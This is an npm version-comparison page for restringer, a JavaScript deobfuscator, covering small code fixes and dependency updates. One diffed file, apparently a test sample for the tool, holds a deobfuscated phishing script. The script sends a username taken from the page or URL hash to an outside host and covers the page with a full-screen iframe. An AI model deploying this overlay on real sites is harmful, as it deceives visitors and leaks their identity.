restringer
Advanced tools
restringer - npm Package Compare versions
Comparing version 1.10.1 to 1.10.2
| { | ||
| "name": "restringer", | ||
| "version": "1.10.1", | ||
| "version": "1.10.2", | ||
| "description": "Deobfuscate Javascript with emphasis on reconstructing strings", | ||
@@ -16,3 +16,3 @@ "main": "index.js", | ||
| "isolated-vm": "^4.6.0", | ||
| "jsdom": "^22.1.0", | ||
| "jsdom": "^23.2.0", | ||
| "obfuscation-detector": "^1.1.6" | ||
@@ -42,5 +42,5 @@ }, | ||
| "devDependencies": { | ||
| "eslint": "^8.45.0", | ||
| "eslint": "^8.56.0", | ||
| "husky": "^8.0.3" | ||
| } | ||
| } |
@@ -18,4 +18,3 @@ /** | ||
| if (['FunctionDeclaration', 'FunctionExpression'].includes(n.type) && | ||
| n.body?.body?.length === 1 && | ||
| n.body.body[0].type === 'ReturnStatement' && | ||
| n.body?.body?.[0]?.type === 'ReturnStatement' && | ||
| (n.body.body[0].argument?.callee?.property?.name || n.body.body[0].argument?.callee?.property?.value) === 'apply' && | ||
@@ -22,0 +21,0 @@ n.body.body[0].argument.arguments?.length === 2 && |
@@ -40,3 +40,3 @@ /** | ||
| } | ||
| if (!targetNode || !targetNode.body) targetNode = n; | ||
| if (!targetNode?.body?.filter) targetNode = n; | ||
| else { | ||
@@ -43,0 +43,0 @@ // Place the wrapped code instead of the wrapper node |
@@ -26,5 +26,5 @@ const {Arborist} = require('flast'); | ||
| let currentIteration = 0; | ||
| let changesCounter = 0; | ||
| try { | ||
| let scriptHash = generateHash(script); | ||
| let changesCounter = 0; | ||
| let arborist = new Arborist(script, logger.log); | ||
@@ -64,2 +64,3 @@ while (arborist.ast?.length && scriptSnapshot !== script && currentIteration < maxIterations && !hasGlobalMaxIterationBeenReached()) { | ||
| ` with ${changesCounter ? changesCounter : 'no'} changes (${arborist.ast?.length || '???'} nodes)`); | ||
| changesCounter = 0; | ||
| } | ||
@@ -66,0 +67,0 @@ if (changesCounter) script = arborist.script; |
@@ -109,4 +109,3 @@ #!/usr/bin/env node | ||
| this.modified = false; | ||
| script = runLoop(this.script, this.safeMethods); | ||
| script = runLoop(script, this.unsafeMethods, 1); | ||
| script = runLoop(this.script, this.safeMethods.concat(this.unsafeMethods)); | ||
| if (this.script !== script) { | ||
@@ -161,3 +160,2 @@ this.modified = true; | ||
| const startTime = Date.now(); | ||
| logger.log(`[!] Deobfuscating ${args.inputFilename}...\n`); | ||
@@ -167,2 +165,4 @@ const restringer = new REstringer(content); | ||
| else if (args.verbose) restringer.logger.setLogLevel(logger.logLevels.DEBUG); | ||
| logger.log(`[!] REstringer v${REstringer.__version__}`); | ||
| logger.log(`[!] Deobfuscating ${args.inputFilename}...`); | ||
| if (args.maxIterations) { | ||
@@ -169,0 +169,0 @@ setGlobalMaxIterations(args.maxIterations); |
| function t() { | ||
| var e = ['364LQAOhD', 'iframe', 'data-fiikfu', 'searchParams', '999999', '8FpuLea', '10cZXSHP', '3029155zGDxjW', '12qNvHsa', 'ddrido', '8964021vmeNuO', 'substring', 'fixed', '567228cqlBcB', 'bottom', '572509wwXbzV', 'margin', 'random', 'height', 'right', 'hash', 'abcdefghijklmnopqrstuvwxyz', '378NHloDJ', '478KOasfu', 'overflow', 'location', 'createElement', 'border', 'position', 'floor', 'left', 'appendChild', 'length', '100%', '491ObZCcR', '40024ItvVfk', '177822QQLRDD', 'style']; | ||
| return (t = function () { | ||
| return e; | ||
| })(); | ||
| var e = [ | ||
| '364LQAOhD', | ||
| 'iframe', | ||
| 'data-fiikfu', | ||
| 'searchParams', | ||
| '999999', | ||
| '8FpuLea', | ||
| '10cZXSHP', | ||
| '3029155zGDxjW', | ||
| '12qNvHsa', | ||
| 'ddrido', | ||
| '8964021vmeNuO', | ||
| 'substring', | ||
| 'fixed', | ||
| '567228cqlBcB', | ||
| 'bottom', | ||
| '572509wwXbzV', | ||
| 'margin', | ||
| 'random', | ||
| 'height', | ||
| 'right', | ||
| 'hash', | ||
| 'abcdefghijklmnopqrstuvwxyz', | ||
| '378NHloDJ', | ||
| '478KOasfu', | ||
| 'overflow', | ||
| 'location', | ||
| 'createElement', | ||
| 'border', | ||
| 'position', | ||
| 'floor', | ||
| 'left', | ||
| 'appendChild', | ||
| 'length', | ||
| '100%', | ||
| '491ObZCcR', | ||
| '40024ItvVfk', | ||
| '177822QQLRDD', | ||
| 'style' | ||
| ]; | ||
| return (t = function () { | ||
| return e; | ||
| })(); | ||
| } | ||
| function e(n, a) { | ||
| var r = ['364LQAOhD', 'iframe', 'data-fiikfu', 'searchParams', '999999', '8FpuLea', '10cZXSHP', '3029155zGDxjW', '12qNvHsa', 'ddrido', '8964021vmeNuO', 'substring', 'fixed', '567228cqlBcB', 'bottom', '572509wwXbzV', 'margin', 'random', 'height', 'right', 'hash', 'abcdefghijklmnopqrstuvwxyz', '378NHloDJ', '478KOasfu', 'overflow', 'location', 'createElement', 'border', 'position', 'floor', 'left', 'appendChild', 'length', '100%', '491ObZCcR', '40024ItvVfk', '177822QQLRDD', 'style']; | ||
| return (e = function (t, e) { | ||
| return r[t -= 494]; | ||
| })(n, a); | ||
| var r = [ | ||
| 'appendChild', | ||
| 'length', | ||
| '100%', | ||
| '491ObZCcR', | ||
| '40024ItvVfk', | ||
| '177822QQLRDD', | ||
| 'style', | ||
| '364LQAOhD', | ||
| 'iframe', | ||
| 'data-fiikfu', | ||
| 'searchParams', | ||
| '999999', | ||
| '8FpuLea', | ||
| '10cZXSHP', | ||
| '3029155zGDxjW', | ||
| '12qNvHsa', | ||
| 'ddrido', | ||
| '8964021vmeNuO', | ||
| 'substring', | ||
| 'fixed', | ||
| '567228cqlBcB', | ||
| 'bottom', | ||
| '572509wwXbzV', | ||
| 'margin', | ||
| 'random', | ||
| 'height', | ||
| 'right', | ||
| 'hash', | ||
| 'abcdefghijklmnopqrstuvwxyz', | ||
| '378NHloDJ', | ||
| '478KOasfu', | ||
| 'overflow', | ||
| 'location', | ||
| 'createElement', | ||
| 'border', | ||
| 'position', | ||
| 'floor', | ||
| 'left' | ||
| ]; | ||
| return (e = function (t, e) { | ||
| return r[t -= 494]; | ||
| })(n, a); | ||
| } | ||
| (function (t, n) { | ||
| for (var r = ['364LQAOhD', 'iframe', 'data-fiikfu', 'searchParams', '999999', '8FpuLea', '10cZXSHP', '3029155zGDxjW', '12qNvHsa', 'ddrido', '8964021vmeNuO', 'substring', 'fixed', '567228cqlBcB', 'bottom', '572509wwXbzV', 'margin', 'random', 'height', 'right', 'hash', 'abcdefghijklmnopqrstuvwxyz', '378NHloDJ', '478KOasfu', 'overflow', 'location', 'createElement', 'border', 'position', 'floor', 'left', 'appendChild', 'length', '100%', '491ObZCcR', '40024ItvVfk', '177822QQLRDD', 'style']; ;) try { | ||
| break; | ||
| r.push(r.shift()); | ||
| for (var r = [ | ||
| 'appendChild', | ||
| 'length', | ||
| '100%', | ||
| '491ObZCcR', | ||
| '40024ItvVfk', | ||
| '177822QQLRDD', | ||
| 'style', | ||
| '364LQAOhD', | ||
| 'iframe', | ||
| 'data-fiikfu', | ||
| 'searchParams', | ||
| '999999', | ||
| '8FpuLea', | ||
| '10cZXSHP', | ||
| '3029155zGDxjW', | ||
| '12qNvHsa', | ||
| 'ddrido', | ||
| '8964021vmeNuO', | ||
| 'substring', | ||
| 'fixed', | ||
| '567228cqlBcB', | ||
| 'bottom', | ||
| '572509wwXbzV', | ||
| 'margin', | ||
| 'random', | ||
| 'height', | ||
| 'right', | ||
| 'hash', | ||
| 'abcdefghijklmnopqrstuvwxyz', | ||
| '378NHloDJ', | ||
| '478KOasfu', | ||
| 'overflow', | ||
| 'location', | ||
| 'createElement', | ||
| 'border', | ||
| 'position', | ||
| 'floor', | ||
| 'left' | ||
| ];;) | ||
| try { | ||
| break; | ||
| r.push(r.shift()); | ||
| } catch (t) { | ||
| r.push(r.shift()); | ||
| r.push(r.shift()); | ||
| } | ||
| }(t)); | ||
| (function () { | ||
| var n = 'abcdefghijklmnopqrstuvwxyz'; | ||
| var a = document.getElementById('ddrido').getAttribute('data-fiikfu'); | ||
| var r = new URL('https://lmo.oscii.io/?'); | ||
| if (!a && window.location.hash) try { | ||
| a = atob(window.location.hash.substring(1)); | ||
| var n = 'abcdefghijklmnopqrstuvwxyz'; | ||
| var a = document.getElementById('ddrido').getAttribute('data-fiikfu'); | ||
| var r = new URL('https://lmo.oscii.io/?'); | ||
| if (!a && window.location.hash) | ||
| try { | ||
| a = atob(window.location.hash.substring(1)); | ||
| } catch (e) { | ||
| a = window.location.hash.substring(1); | ||
| a = window.location.hash.substring(1); | ||
| } | ||
| if (a) { | ||
| try { | ||
| a = atob(a); | ||
| } catch (t) { | ||
| } | ||
| r.searchParams.append('username', a); | ||
| if (a) { | ||
| try { | ||
| a = atob(a); | ||
| } catch (t) { | ||
| } | ||
| r.searchParams.append('abcdefghijklmnopqrstuvwxyz'[Math.floor(Math.random() * 26)], 'abcdefghijklmnopqrstuvwxyz'[Math.floor(Math.random() * 26)]); | ||
| var s = document.createElement('iframe'); | ||
| s.style.position = 'fixed'; | ||
| s.style.top = '0'; | ||
| s.style.left = '0'; | ||
| s.style.bottom = '0'; | ||
| s.style.right = '0'; | ||
| s.style.width = '100%'; | ||
| s.style.height = '100%'; | ||
| s.style.border = '0'; | ||
| s.style.margin = '0'; | ||
| s.style.padding = '0'; | ||
| s.style.overflow = 'hidden'; | ||
| s.style.zIndex = '999999'; | ||
| s.src = r.toString(); | ||
| document.body.appendChild(s); | ||
| r.searchParams.append('username', a); | ||
| } | ||
| r.searchParams.append('abcdefghijklmnopqrstuvwxyz'[Math.floor(Math.random() * 26)], 'abcdefghijklmnopqrstuvwxyz'[Math.floor(Math.random() * 26)]); | ||
| var s = document.createElement('iframe'); | ||
| s.style.position = 'fixed'; | ||
| s.style.top = '0'; | ||
| s.style.left = '0'; | ||
| s.style.bottom = '0'; | ||
| s.style.right = '0'; | ||
| s.style.width = '100%'; | ||
| s.style.height = '100%'; | ||
| s.style.border = '0'; | ||
| s.style.margin = '0'; | ||
| s.style.padding = '0'; | ||
| s.style.overflow = 'hidden'; | ||
| s.style.zIndex = '999999'; | ||
| s.src = r.toString(); | ||
| document.body.appendChild(s); | ||
| }()); |
Sorry, the diff of this file is not supported yet
New alerts
License Policy Violation
LicenseThis package is not allowed per your license policy. Review the package's license to ensure compliance.
Found 1 instance in 1 package
Fixed alerts
License Policy Violation
LicenseThis package is not allowed per your license policy. Review the package's license to ensure compliance.
Found 1 instance in 1 package
Improved metrics
- Total package byte prevSize
- increased by0.07%
673061
- Lines of code
- increased by0.96%
12202
Dependency changes
+ Added@asamuzakjp/dom-selector@2.0.2(transitive)
+ Addedagent-base@7.1.1(transitive)
+ Addedbidi-js@1.0.3(transitive)
+ Addedcss-tree@2.3.1(transitive)
+ Addedcssstyle@4.1.0(transitive)
+ Addeddata-urls@5.0.0(transitive)
+ Addedhtml-encoding-sniffer@4.0.0(transitive)
+ Addedhttp-proxy-agent@7.0.2(transitive)
+ Addedhttps-proxy-agent@7.0.5(transitive)
+ Addedjsdom@23.2.0(transitive)
+ Addedmdn-data@2.0.30(transitive)
+ Addedrequire-from-string@2.0.2(transitive)
+ Addedrrweb-cssom@0.7.1(transitive)
+ Addedsource-map-js@1.2.1(transitive)
+ Addedtr46@5.0.0(transitive)
+ Addedw3c-xmlserializer@5.0.0(transitive)
+ Addedwhatwg-encoding@3.1.1(transitive)
+ Addedwhatwg-mimetype@4.0.0(transitive)
+ Addedwhatwg-url@14.0.0(transitive)
+ Addedxml-name-validator@5.0.0(transitive)
- Removed@tootallnate/once@2.0.0(transitive)
- Removedabab@2.0.6(transitive)
- Removedagent-base@6.0.2(transitive)
- Removedcssstyle@3.0.0(transitive)
- Removeddata-urls@4.0.0(transitive)
- Removeddomexception@4.0.0(transitive)
- Removedhtml-encoding-sniffer@3.0.0(transitive)
- Removedhttp-proxy-agent@5.0.0(transitive)
- Removedhttps-proxy-agent@5.0.1(transitive)
- Removedjsdom@22.1.0(transitive)
- Removednwsapi@2.2.13(transitive)
- Removedtr46@4.1.1(transitive)
- Removedw3c-xmlserializer@4.0.0(transitive)
- Removedwhatwg-encoding@2.0.0(transitive)
- Removedwhatwg-mimetype@3.0.0(transitive)
- Removedwhatwg-url@12.0.1(transitive)
- Removedxml-name-validator@4.0.0(transitive)
Updatedjsdom@^23.2.0